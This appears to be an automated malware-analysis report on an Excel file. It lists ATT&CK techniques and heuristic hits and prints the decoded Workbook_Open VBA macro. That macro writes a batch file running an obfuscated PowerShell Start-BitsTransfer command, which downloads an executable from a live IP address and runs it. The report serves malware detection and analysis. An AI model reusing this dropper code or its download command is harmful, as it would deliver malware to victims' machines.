MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The Workbook_Open VBA macro is designed to stage a PowerShell command that downloads and executes a second-stage payload. The macro constructs a batch file containing a Start-BitsTransfer command to fetch 'officemanage.exe' from 'http://18.156.71.237/hN/5/B/RFQ_5550_178_03309IMG.exe' and then execute it. This indicates a downloader or dropper functionality.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub Workbook_Open() -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set computeropen = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6)) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1358 bytes |
SHA-256: 6a6cc3b117eb61fb4efeef331437a7057d00f03a5a1144e51bedb40a1227ce72 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
halfnature = "pow^ers"
fishamount = "he^ll"
Set computeropen = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6))
attentionbill = "C:\Users\Public\Documents\god.bat"
Set computeropen2 = computeropen.CreateTextFile(attentionbill)
computeropen2.WriteLine halfnature & fishamount & " -w hi sl^eep -Se 31;St^a^rt-BitsTr^ans^fer -Source htt`p://18.156.71.237/hN/5/B/RFQ_5550_178_03309IMG.e`xe -Dest C:\Users\Public\Documents\officemanage.e`xe;C:\Users\Public\Documents\officemanage.e`xe"
computeropen2.Close
GetObject("new:13709620-C279-11CE-A49E-44455354000" & CInt(0.3)).Open (attentionbill)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub existstrong()
'
' existstrong Macro
' 1Y9EPHD78LD1
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.